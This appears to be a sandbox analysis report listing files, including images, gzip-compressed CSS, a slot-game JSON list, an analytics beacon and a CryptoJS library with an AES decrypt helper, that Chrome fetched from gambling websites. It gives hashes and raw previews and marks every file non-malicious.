                                                      Preview:.PNG........IHDR...............^.....PLTE_=.G-..`#.S.,..V5.lA..f.......l(sJ...............t*..1Y......v66!.p[!.l4......PC5..6..P.Ci.... ......0....6........./M......#.6.|..@.....f1......&..S.m.UUG.tD.....r.Z.}...H.T....\...ne:....u.......................\y...\.:..N.r..EaP4.....$.....K......t.}H....r....D.......}.....r....d.l..P..H........:........r..t@NG))(..%..:......aO..|.....i:..4=;...O..J....f.........l`Y.f.....^.UO.l... a.....[.U.........}.v.M8......`.......!..ri.6+h......M..6@>#.2.py^.....aeh~...b...HB..........Be.....NZX./.|.........*IX..-.,.8+w.......m..<...Og...[.M.9.V.....LB=.8k...N..Y....i....0....b.s.7(...B...'....g.jR.c..8{....^..Klf.V.iW.;...3......p5x..F....r..n...W... ...OE.P4Qq.\.....`\..........|.F=..=J...\.-..u.IDATx....@..'I.m.M.6..X-.U->.O...EZ.bA...Z.......(.((....QW.\.N.q.......33./D..L'......3g...#.s..o.T*.cI5...l.0.-'..Z..x..9...NZ..ey...7.$..s.c.L.m=Ww]<)oy.+..}........A..2eJs0....$q.. .(.+J..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JSON data
                                                      Category:dropped
                                                      Size (bytes):3511
                                                      Entropy (8bit):5.11085126261572
                                                      Encrypted:false
                                                      SSDEEP:96:/bcvlvUfvW4BvkvvgvZvQtvQHvWvkvKvhvrxBrj:/Ivlv4v5BvkvvgvZvEvsvWvkvKv5Hv
                                                      MD5:376BF7683AA9E5C1391CC2BAF715B5EB
                                                      SHA1:C06C4A70A2C16D469D893D204E5CBC3E9BC3CC27
                                                      SHA-256:FEAAAA45B8BB54B58773CE586CAEC64F5F10CA25AE1DE10BA9A5E322E498D2C5
                                                      SHA-512:57C1ACDC2C4CB5C7FA0A112F995FFCF07C56596BEB9ABBAB2BD2A75D3543ED046981847EE4DDB1381B292DDDA42BF880B450502BDA265EA32A69F75DD9614B7A
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:{"gamelist":{"current_page":1,"data":[{"id":31356,"name":"Sizzling Hot","pfid":202,"ppname":"Joker Slots","code":"JOKER","img":"\/\/5getfab.segrft.com\/common\/storage\/game\/egame\/joker\/ww3a8wsu4de7c.png?ver=1673334591","progressive":null,"ppid":202,"notry":0,"favorite":false},{"id":31360,"name":"Hot Fruits","pfid":202,"ppname":"Joker Slots","code":"JOKER","img":"\/\/5getfab.segrft.com\/common\/storage\/game\/egame\/joker\/soojfuqnaxycn.png?ver=1673334591","progressive":null,"ppid":202,"notry":0,"favorite":false},{"id":31357,"name":"Dragon Power Flame","pfid":202,"ppname":"Joker Slots","code":"JOKER","img":"\/\/5getfab.segrft.com\/common\/storage\/game\/egame\/joker\/3yfmucpss64mk.png?ver=1673334590","progressive":null,"ppid":202,"notry":0,"favorite":false},{"id":31359,"name":"Burning Pearl Bingo","pfid":202,"ppname":"Joker Slots","code":"JOKER","img":"\/\/5getfab.segrft.com\/common\/storage\/game\/egame\/joker\/tocki7xk7xwq1.png?ver=1673334591","progressive":null,"ppid":202,"notry"
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:gzip compressed data, from Unix, original size modulo 2^32 725
                                                      Category:downloaded
                                                      Size (bytes):272
                                                      Entropy (8bit):7.173320837335257
                                                      Encrypted:false
                                                      SSDEEP:6:XteqX9aA4QrL0fVtHkI6OWr1FMHSZr25fFfz4kHcCVcl:XANhfEPhMSCdeccl
                                                      MD5:643E54D1EBF74F2DE9F35D7300FC53C2
                                                      SHA1:36057E2772AFFF8F5DEEF8BCD9D8F6C9DC05ECBD
                                                      SHA-256:90EAA9D38F7D8196B7A8A74F54B8427E268F27C7EF4F08B3F09DA7B39C6F0BAF
                                                      SHA-512:F6FF5C4092E5AEDC8E15E3FADB0D7C94F144CB9CA61403F100CFA75EF7EA49D314EF8B27C0F8546236AF5E1EAFFD422B0613C020F8887162B2C1201D05930A3D
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/plus/css/unite/float_unite.css?ver=1606790105
                                                      Preview:............An. .E.>..v..D..s...bF.....w/..v.T.T.....<.].B+=..XX....%.d.Y.>.y..:...v)|.@J...H.9..sP...o[.......^.....3...c..e.<E>.^.M}...P..K.:.....j .....b...G....,.....Mn.[.-.6........kQ^..B .K..kb,.N..p..[.........z.?o.d.N.0.zS..G.M.6.QZu..t~q.>....:.j@....
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:GIF image data, version 89a, 1 x 1
                                                      Category:downloaded
                                                      Size (bytes):43
                                                      Entropy (8bit):3.0950611313667666
                                                      Encrypted:false
                                                      SSDEEP:3:CUMllRPQEsJ9pse:Gl3QEsJLse
                                                      MD5:AD4B0F606E0F8465BC4C4C170B37E1A3
                                                      SHA1:50B30FD5F87C85FE5CBA2635CB83316CA71250D7
                                                      SHA-256:CF4724B2F736ED1A0AE6BC28F1EAD963D9CD2C1FD87B6EF32E7799FC1C5C8BDA
                                                      SHA-512:EBFE0C0DF4BCC167D5CB6EBDD379F9083DF62BEF63A23818E1C6ADF0F64B65467EA58B7CD4D03CF0A1B1A2B07FB7B969BF35F25F1F8538CC65CF3EEBDF8A0910
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://hm.baidu.com/hm.gif?hca=E4D1CF12C6FA10DD&cc=1&ck=1&cl=24-bit&ds=1280x1024&vl=907&et=0&ja=0&ln=en-us&lo=0&rnd=450682172&si=947ea0365dd8ab01fc51bd9439b42930&v=1.3.2&lv=1&sn=48177&r=0&ww=1280&u=https%3A%2F%2Fb45032.com%2F%23&tt=bet365%E8%8B%B1%E5%9B%BD%E4%B8%8A%E5%B8%82%E5%AE%98%E7%BD%91
                                                      Preview:GIF89a.............!.......,...........L..;
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 270x234, components 3
                                                      Category:dropped
                                                      Size (bytes):4267
                                                      Entropy (8bit):7.487674706942627
                                                      Encrypted:false
                                                      SSDEEP:96:rQUNe3tjQTuG9jZIBSN2l7IUUOzQVUAQjPkG:rxNZuG9MS8l7oOkVUAG
                                                      MD5:FEE5097BC88F140446C66C0F02F4AE1A
                                                      SHA1:39E1A7314D93A6E3AFEE86A58A5B67A3943C8723
                                                      SHA-256:7068EE30D85BE9813BF2277CEFF755A0C2ABEEF74CD5000BEAA910C7DC3DFAB8
                                                      SHA-512:E9536DA98F5BDD479946B6B68B5C51DA09819FA95DD0739FF733892615E4E39584D4D6236C46A4AA9AB77CECED83F925C0FDFF985480643884D74B8F799B2378
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:......Exif..II*.................Ducky.......P.....ohttp://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:BB818149EA25E311A32FDF049616BCF5" xmpMM:DocumentID="xmp.did:0F0B918325EB11E38934F11AFF6C508F" xmpMM:InstanceID="xmp.iid:0F0B918225EB11E38934F11AFF6C508F" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:BB818149EA25E311A32FDF049616BCF5" stRef:documentID="xmp.did:BB818149EA25E311A32FDF049616BCF5"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.............................................................
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:gzip compressed data, from Unix, original size modulo 2^32 1255
                                                      Category:downloaded
                                                      Size (bytes):396
                                                      Entropy (8bit):7.420936931912505
                                                      Encrypted:false
                                                      SSDEEP:12:X2kgfGktSteir9YglDDT6X4c96AT+o0V1J:X2VknreaTu4qt0Vj
                                                      MD5:6AAFE94949000729E1AD654C3F99B7F1
                                                      SHA1:73E381E2C974E24712919F40B3C42A51351936C7
                                                      SHA-256:A6473A467669F1020261845960FB440B0D444F2D39A01585E10C2DD0827BE7AD
                                                      SHA-512:F51A9BBE3DA4E5664F5E9C987FB141FD499D99560E9179297BAE46C6D1F526117D7C962979091CB3C511F0ECD692CE8E8348C92CE6C4AA4D04DAFC176C410929
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/plus/css/custom/float_customer.css?ver=1606988918
                                                      Preview:.............n. ...}.vk..j...5.Zi%A0..-{.....[.^.;.r.....X.c.q.E.....>#d...@V.m......A.3A'n.N.m.u9..-.....?=...a.......Gy%...... (....}sn.....\....|5"..Tk........C.....VdY..U...D.......Ze8pe...(....}.....s.L{1.AS9.......`..Vg^AMPy..M..N.....6..5...%A..d...~..y9..R...x[^Y..k.h../.7te..|\T.ad.Q.Pf.{....3L.m?..o~..x.Gw.7&q.....,.O.O.~..{.M..nK~..O%.....v.).PW5.~..._[..0H......
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit/color RGBA, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):89883
                                                      Entropy (8bit):7.989393627439856
                                                      Encrypted:false
                                                      SSDEEP:1536:XkOCsrftG/NW/MXNIwszC/yB9wCPpUV0CsbRfqyghEByMIUlza9KsVXSWGSxfJxT:Lt/wNI1zCQ9SMJza9ewfJx9ECwYkYC6
                                                      MD5:6BE7795EF3B5BF21EE7C1FCF344BA626
                                                      SHA1:E0B15BEAA56769422C512C4F411413D28EAA5CCD
                                                      SHA-256:AC68309DD8B316760BCD2CFFB7B3C3063A958F061BC83DF6E1A1ADF4805C8B0C
                                                      SHA-512:B9013318CC91EBED1F13ABFA5E07C10DE73B1BE0D175FFA07DA3468D31F7E6270747EAF0AD3D0800246355ED9A3B27EE89AB3987840DEB8857AF4A36D45B5278
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/common/storage/game/egame/upg/UPG_treasureHeroes.png?ver=1712128601
                                                      Preview:.PNG........IHDR..............X......zTXtRaw profile type iptc..x.M.;..0.C...#.i........@...0..)...[.a..:.m_.yEHlM-..+S.s..!..,{...(|v.."L.."WX.T...JE.'*k....R/7..$. ..c..."iTXtXML:com.adobe.xmp.....<?xpacket begin='.' id='W5M0MpCehiHzreSzNTczkc9d'?>.<x:xmpmeta xmlns:x='adobe:ns:meta/' x:xmptk='Image::ExifTool 11.70'>.<rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'>.. <rdf:Description rdf:about=''. xmlns:dc='http://purl.org/dc/elements/1.1/'>. <dc:subject>. <rdf:Bag>. <rdf:li>Icon</rdf:li>. <rdf:li> mgp</rdf:li>. <rdf:li> upg</rdf:li>. <rdf:li> Human</rdf:li>. <rdf:li> Person</rdf:li>. </rdf:Bag>. </dc:subject>. </rdf:Description>.</rdf:RDF>.</x:xmpmeta>.<?xpacket end='r'?>..=... .IDATx.....e.y.......qr..3..D0. .A.$%*..$Y..k.{...k...e..-.v..G.L[.H{E..e."a......0...{f.{:w.x..S...z0............K...}%Fj.h.....'.@+.F..u..5e?c.. ..B.......[J.h..w.y.~G .@..Z....t...s.w..............e).}..%..5wN.Kw..5....1.y+D).2..F......(.<@.6...9...$G..E
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):30373
                                                      Entropy (8bit):7.991821443507693
                                                      Encrypted:true
                                                      SSDEEP:768:GS7/BeHThiLRn7oTMInpZBtMbKegBFk0j+iMCwiplUCN/X:G0/fd7yM+BtM2HdynB0/X
                                                      MD5:69B3E817B0DCA4A66857567A297D84DE
                                                      SHA1:40E6C8865C2599B6AA8DDE8F6B2D97010A0BA479
                                                      SHA-256:423A8E906B85E3DD39044EADAC0673B43CC90DC31070891FABCF8CDCE09AB88F
                                                      SHA-512:184364C121761D3EAE885C36AFEE738EE9FFC0FD67160DE27B8DEAA95F3913D2E3B43D9F1144B23333A572C911082A5C4060A459AC7A5B78EF25E39753CDB1E4
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/common/storage/game/egame/joker/tocki7xk7xwq1.png?ver=1673334591
                                                      Preview:.PNG........IHDR...............^.....PLTE+...K....~I.$...O..Q.2".y?.vG..K.H-.n@..Z..K..P..B...).B..].u2.....W.<'....R1..x..O..P..S..m......0.[.....h..Z.q....&.l.....g...<.d....M ..?.\6..|.i*..x...6..'f7..C..!.. ....c.Z-..%..........6.L...$...........R.-.. .g.>.........?=.......Y....].....|.......<..p......A..........$.3..{..MLp...I..q .T..j......*...j!;_...1...R7..m...7....g...........$./-.!.......&....^..rA..H.gH.]..Y!j=...._?......2?'.......v,E..Z0.-1..J..t%$h-#.m!.......e.I-.......`^k...j4.5'...1..^.....u6.:.....B.| Z...w........S.aH.H4.4-.1-.}I....Y.B:....M.+(..s@6.^..#..@Y&.qV..-(.......\...X-D...K....,"..Q.-.82:.W/.oH.|..z..N..9.f>.MJ~*/.i....5E..3.M..@.....LKK.D>..d..2..,.....WD.C......e...Z|yz.....o.vt....k[.|c`_........hpf7WS+...%...Ik.pR.....4...|.w..._...6..c....s`IDATx..Q..p......."".u=t.VD'.QR'..KE..]ET..........M*..$<.5.C.e..u..S.aA.${..z.....w^....t.......o..q.^..'c...F.UK.:.....h...,..4i@R8NQ.I.FJQ...@N......d..D&C......@&..l....p
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality", baseline, precision 8, 56x23, components 3
                                                      Category:downloaded
                                                      Size (bytes):1046
                                                      Entropy (8bit):7.3681447333978
                                                      Encrypted:false
                                                      SSDEEP:24:O7A+di9YMWn0o0XxDuLHeOWXG4OZ7DAJuLHenX31I075JAo1Ko:GAmi9YM+uERA/VB
                                                      MD5:E50D5E3493BCF2F07F29783F943A8E5F
                                                      SHA1:46204C05F802CB6FF5CE71072BA9D9E3C0DDCE17
                                                      SHA-256:163376CD27B215E837B8B2E0E861072253272F9BD0F3F15902DF56C13C08E052
                                                      SHA-512:53B4FF8C4C6B6A88DBE1C71B9CD33C9F1D5E27970D6FF221845418FF88294CE57F8ACC017D2F58F08A2E274E248C852E487EC182476A6C8B35A41BA75730E65B
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://b45032.com/gdcode_1736725656
                                                      Preview:......JFIF.....`.`.....>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........8.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..}cZ...m>..B.M2$.;Wy*.Os..o.+...v.L.3|.w....m.....lXj.jV.}.m.......Er5.g}H/c..m..i...)^'.3.".W..#.nH..5MBy..............G.tg...Oj..f...t._..^.=....{V>....Mk..wj..Iu E.S..7);...GL....F...]i.l....@.5W(.N<.#g..9\V.r~...w.mnlc'..h..N..|8....WS....sD..C+....k.[t9Er.!.QE#0.'..w..R`0%..`=3.g...j(....k....
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (47992), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):47992
                                                      Entropy (8bit):5.605846858683577
                                                      Encrypted:false
                                                      SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                                                      MD5:CF3402D7483B127DED4069D651EA4A22
                                                      SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                      SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                      SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):26620
                                                      Entropy (8bit):7.9873822930441705
                                                      Encrypted:false
                                                      SSDEEP:384:LjsXpD9JoEBDFzpboYwNIlpmdtgcatBHM3MX6tZf0DvXPAJQ+6+Tr9ohkamarP4z:xE7bonyzmd7P50rwgFufaG/kr6a4Vq9+
                                                      MD5:A9AF11E374576557196E4E48DE3D2313
                                                      SHA1:93F11781EA2ACFA48DD77A7C25EE1A0437B21844
                                                      SHA-256:F2FC31BB75663E37CC0C52604D61B8D27A1B4A2F3505CC8DA074A3F9FDD4C045
                                                      SHA-512:FD46421B5E2A20EA5131CA989D0EF31725E069D0F994B0EC730231E16394AE002CAB87AEE3B8DD8D2ED89BB1C95563187FDC001DDCD2ABFFA16DD954BD9E1952
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...............^.....PLTE.........%.............................QGNc...$5I...........V...........>.....1..#z.....Yw.0>..x..........c............A......dU]t......w.n..ERa.g'8S[i|x..........M$..)h..b.N[p'....Y.U....`...........k.?<B.F........j.....x.r........p.........A1$..i........9_...=..e08q...Cz...r....`pfh[........-H....c...........].w........O.......er.Y.....MfP...T....*Ii........|..........;....0.....0]................6....Pm......;CV#.......1o.....Cy......5e.. y......V........Y7yA.8n..~l...0^uM....-...=............9\...z_..l.........rE.xU...D...>...x.... \~c....Y......GHi.."......_....fkKO..xv.B...).iJ.}..V8d ......G....a.M 8...dz...:!...'|.s,>......{v^P....H3..e...iB.......c.cK.<...{............|.'":Q...,........dm...J.....Rr....J.{.A..q.H..d.IDATx..Ah#U....N.:..I&.IB.6l.v@E.(.d.R...]..D.*#S.]....E..*#.{......^.U..x.6...... .....=...d^l...$............".^`.5^..L.T.E..EM.l=..R.\.W(T*.d2!..5...5...]).|...l3m0..i/...
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):21325
                                                      Entropy (8bit):7.978796973733474
                                                      Encrypted:false
                                                      SSDEEP:384:x9tXpi1a/Q3k+YTwkJyqREQwDSyF9RuzWLbNxCvPY6qhOGxisBszFc:x9hUA/2ZBkMVQwD1F2gqPYnVxisBszW
                                                      MD5:7F7F58A3BE003C5DBD0FF0C3AA1FBCD0
                                                      SHA1:E153296CA45C0D82DD82BECE52BBF1DEEBDF0D22
                                                      SHA-256:A9A3A7A52B3CAE8DB5EE87726A3050DA233DF380C6C26B37052B0BEFEBAD15D0
                                                      SHA-512:5CD9CA615212270005D9ABF736F781E7990E32CC6A1F6CE3CECA68BAF8F17E66F8CFC3FBCA74E27962FCA8D3915A45497562F884BE9FF83A577637CEDB7D0A87
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/common/storage/game/egame/upg/UPG_FaFaFortune.png?ver=1728355170
                                                      Preview:.PNG........IHDR...............^.....gAMA......a.....sRGB.........PLTEZ!.U...B..K..d....^.........]..T..0..p.>............L..v..k...r...8................T.........#.|...{..1.J.....>.......".....# !h..!...=.t.........&....*.Z..w.........~...J.......#..j...............i.......!.SD.D....;..G9.................0.....!.".1........s...............&...j..Q....k<.......M2..2-0.6..:..`.]..[8..1..q..-.^......5....-..A.....Y.!.....e..pH.!..gI..X..5..z.+!.....G..i...".......X..F..g...xZ.D'.rO?=B...}.mB.~......zZ...b?.$..g...@....k^...]%..v!.y.....~........a.Ay3..Z<.O..w(.z!...MLT.....i..e`l.M..9(H...m.._c..3....I.S..&,../...H5..j.e .H..]$......yz..H.I..L4...5..5.. ...n5.R......O&.b..\.B....{)Q.gN.U>/oRE{8-.2..cA.pN.w.zO..F:,o.l\.X......c...>O.......R.....u...j........J>.~....\.0....a........r..f.X.c.. .IDATx...\.W...B......+.U..C...2.!..........\...e....U..RDQ@D+j.....ZG.Xo..jk.v.....}.s.7!*b;.....a{I.9..Y.s..x....f.?%..8>..?.....B....}...?...= .<.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):20525
                                                      Entropy (8bit):7.97670131878482
                                                      Encrypted:false
                                                      SSDEEP:384:6w8X5+36lD8pwpmkNuuV57QeVGLrLFNMcZk6C2D/pELhf73sXYncLl9y:6w33ypmk7X7pVG/LFNFZkSpELhDcLry
                                                      MD5:995AB390B0B71919101C41051D11509E
                                                      SHA1:21CA377B8A19D048B719F19EEF318B0B1F0A7451
                                                      SHA-256:53DD832D68CC6769CC0E7AD47B7784A06A59378FA08B6E0AD07F0D29E486E309
                                                      SHA-512:0BDBECCBA4F8CA4A92A88EEFC53CD4154D18F7E423DF013D9BF541A5E3218F0273984C09EA9B40E4C1E4C98B63AB1ED503AB6DCDCB1C35A14A4236CC3362453E
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/common/storage/game/egame/upg/UPG_miningFever.png?ver=1712128601
                                                      Preview:.PNG........IHDR...............^.....PLTE..3.......................B..........................o..:..........S..x........b....L.}.?.......^......p.@....5....d....].J...........8.6......{Q.B.X..B..d....@..~.2..}..Fk..|m.{P....vB.u..Q..O..-.}h.sD..t.^4x.`.g...Bl..~}..oEz.Qb.kR..S.~.t..sf.z<.a9.oTyvn`w.yyAc~Y.aD.K/.\yKv.em|.`.xiZM|h.U5xF..c$`rM;t..YNkfi:yvhi8.?).E.`b].V=.N4Qdw(u.6i.HjU\[kmWP.R.g4.yFitQ72igS_=.F3#kw.;$RWVNTfb*.mGC<Wp.+.[MIn5."[..amu'.v?3COb[L0U,.V#.nB.Z".@S;GIUh>2..u..........S_;GMIBB....Gc_(.Q..V87Z8#X..p+.r..F$.`..5>?2=KD9.r.W.GRI..W.zM/.D-<M.uB$f446_.SG..&5?A...;GZ .9,%D.q6..3#><.nA#./..)*-.3=N.P>.M7.e,..0.]+.y/.K0!.&.?.#.$.G.)3'.X4.B#.n...".P..F..b..@.!,..V".@..(*....K..I..2..T..$..E.....T..V..P..B..I..C..6..>..;..6..E.....9...........+.....(..%..........4.A..L.IDATx..qlTWv.'..6.vW.U.....D...."..:4*!..*..Tu...U.. "+.*...FJ...7Yg0X.6...c.!6.b..:..0vm<.)S<.....=.....9...fb{7.~..7.]F...;.....!J$.|...4G[.......f...H$2....##Wz::zF.A^.Aic.e..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:GIF image data, version 89a, 204 x 23
                                                      Category:downloaded
                                                      Size (bytes):620
                                                      Entropy (8bit):7.47292623667424
                                                      Encrypted:false
                                                      SSDEEP:12:MOoKTM6vu0xRKUBSlIReDl89cj2w2y/n8yc8E5j8GoPYwkGZDtL:MS1u0bBS2eWExbDE5cRk8ZL
                                                      MD5:7C5D7D1DADD0CF04FF184D3CC7BCEB0A
                                                      SHA1:18A9F45930646CC269B8382FA2BCBFAD76703A3A
                                                      SHA-256:4612F5E2F5F34A0075FD97CDB9EA4D9A3CFD1D24749B9BC7A0AAFB0E2CA2B960
                                                      SHA-512:D166AB123258D07E09851A02CD1AB905CD95BDDD4D32EBA071A84A42B8A9785A5C6C861D9EEE5C81D9351AB38C29E3C68456E4C5317EFFDF9B1206C6BD5E1FD6
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/index/en/liveinplay.gif?ver=1683086133
                                                      Preview:GIF89a..........M....)...M.F..8.......!.`k........?.u0.j\.....!.Q....."0.Nz....k.?..-?.J\.Cz.<..&..1.....U!..NETSCAPE2.0.....!.......,............'.di.h..l.p,.tm.x..|....pH,...V.@.Q...4...*.E.du..]R.........D.v...........*.y.$.y.$x..k.kmo.qm.$u(....z[..).z.%..^".y...G.pmn..v&....".(.z}#......E.....#.wy.......'....%.....e..A.q....T...#....(...........#...m0...`....>... .k.J.j. O....p2@.$..o......5=y$.. h.F...}..h...hL......6."\.`...].`..x/..}...*7b...`k.].`.-.y4!....._0.P..aZ...~`.!..(z.....E.v.*N......l..|..m'...f.H":..8."+.....!`d..c.....}]F.=9..~%....[v..?.@..D..$..n...............O.|...;
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):26620
                                                      Entropy (8bit):7.9873822930441705
                                                      Encrypted:false
                                                      SSDEEP:384:LjsXpD9JoEBDFzpboYwNIlpmdtgcatBHM3MX6tZf0DvXPAJQ+6+Tr9ohkamarP4z:xE7bonyzmd7P50rwgFufaG/kr6a4Vq9+
                                                      MD5:A9AF11E374576557196E4E48DE3D2313
                                                      SHA1:93F11781EA2ACFA48DD77A7C25EE1A0437B21844
                                                      SHA-256:F2FC31BB75663E37CC0C52604D61B8D27A1B4A2F3505CC8DA074A3F9FDD4C045
                                                      SHA-512:FD46421B5E2A20EA5131CA989D0EF31725E069D0F994B0EC730231E16394AE002CAB87AEE3B8DD8D2ED89BB1C95563187FDC001DDCD2ABFFA16DD954BD9E1952
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/common/storage/game/egame/joker/xkbfobaryz7xs.png?ver=1731898048
                                                      Preview:.PNG........IHDR...............^.....PLTE.........%.............................QGNc...$5I...........V...........>.....1..#z.....Yw.0>..x..........c............A......dU]t......w.n..ERa.g'8S[i|x..........M$..)h..b.N[p'....Y.U....`...........k.?<B.F........j.....x.r........p.........A1$..i........9_...=..e08q...Cz...r....`pfh[........-H....c...........].w........O.......er.Y.....MfP...T....*Ii........|..........;....0.....0]................6....Pm......;CV#.......1o.....Cy......5e.. y......V........Y7yA.8n..~l...0^uM....-...=............9\...z_..l.........rE.xU...D...>...x.... \~c....Y......GHi.."......_....fkKO..xv.B...).iJ.}..V8d ......G....a.M 8...dz...:!...'|.s,>......{v^P....H3..e...iB.......c.cK.<...{............|.'":Q...,........dm...J.....Rr....J.{.A..q.H..d.IDATx..Ah#U....N.:..I&.IB.6l.v@E.(.d.R...]..D.*#S.]....E..*#.{......^.U..x.6...... .....=...d^l...$............".^`.5^..L.T.E..EM.l=..R.\.W(T*.d2!..5...5...]).|...l3m0..i/...
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text
                                                      Category:dropped
                                                      Size (bytes):531
                                                      Entropy (8bit):4.811119937201228
                                                      Encrypted:false
                                                      SSDEEP:6:AL2XwANrdQIYkSRUQbdfE1AkeYU71BOAyJRUYU71BYeAQPdlMJlnLgdG07dhimJK:ALawANY1Ru6guODvRuYzQ1lGcdGQimJK
                                                      MD5:1D1D23F897C7F9FA4B24EEB8159D7E21
                                                      SHA1:9C6AB5FED65ABE81454978F1E844C4F36D61A1C7
                                                      SHA-256:8DA1DB8ADC85DC835413880C71CC811C762E48018590F9A991115E83A722C869
                                                      SHA-512:4D258CF5B37B503615A1373AEBF3474EC8F94351455729665223A9318067CA6B815D0BF3C265EAD937660BFB3B0E75B25F450EF1B235A64B32D87DF01E1B8E32
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:function cryptoJsAesDecrypt(encrypted, pass) {. var key = CryptoJS.SHA256(pass);. var ivAndCiphertext = CryptoJS.enc.Base64.parse(encrypted);. var iv = CryptoJS.lib.WordArray.create(ivAndCiphertext.words.slice(0, 4));. var ciphertext = CryptoJS.lib.WordArray.create(ivAndCiphertext.words.slice(4));. var decrypted = CryptoJS.AES.decrypt({ ciphertext: ciphertext }, key, {. iv: iv,. padding: CryptoJS.pad.Pkcs7,. mode: CryptoJS.mode.CBC. });. return decrypted.toString(CryptoJS.enc.Utf8);.}
